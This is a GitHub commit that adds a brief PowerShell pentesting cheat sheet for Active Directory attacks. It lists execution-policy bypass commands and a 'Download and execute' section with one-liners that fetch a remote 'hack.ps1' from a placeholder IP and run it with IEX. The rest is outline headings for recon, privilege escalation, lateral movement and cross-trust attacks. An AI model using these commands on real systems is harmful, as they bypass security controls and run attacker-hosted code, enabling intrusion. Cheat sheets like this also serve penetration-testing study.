Add files via upload

This commit is contained in:
ARZ 2021-12-07 17:43:34 +05:00 committed by GitHub
parent 6de30848b3
commit bfdc48cc8f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,36 @@
## Powershell basic help commands
`Get-Help`
`Get-Help process`
## Powershell Execution Policy bypass
`powershell -ExecutionPolicy bypass`
`powershell -c <cmd>`
`powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"`
## Powershell importing module / scripts
`Import-Module <module_path`
listing commands in the module
`Get-Command -Module <modulename>`
## Download and execute
`IEX (New-Object Net.WebClient).DownloadString ('http://ip/hack.ps1')`
`IEX (iwr 'http://ip/hack.ps1')`
Recon
Domain Enum
Local priv
Admin Recon
Lateral Movement (while being persistant)
Domain
Admin priv
Cross Trust Attacks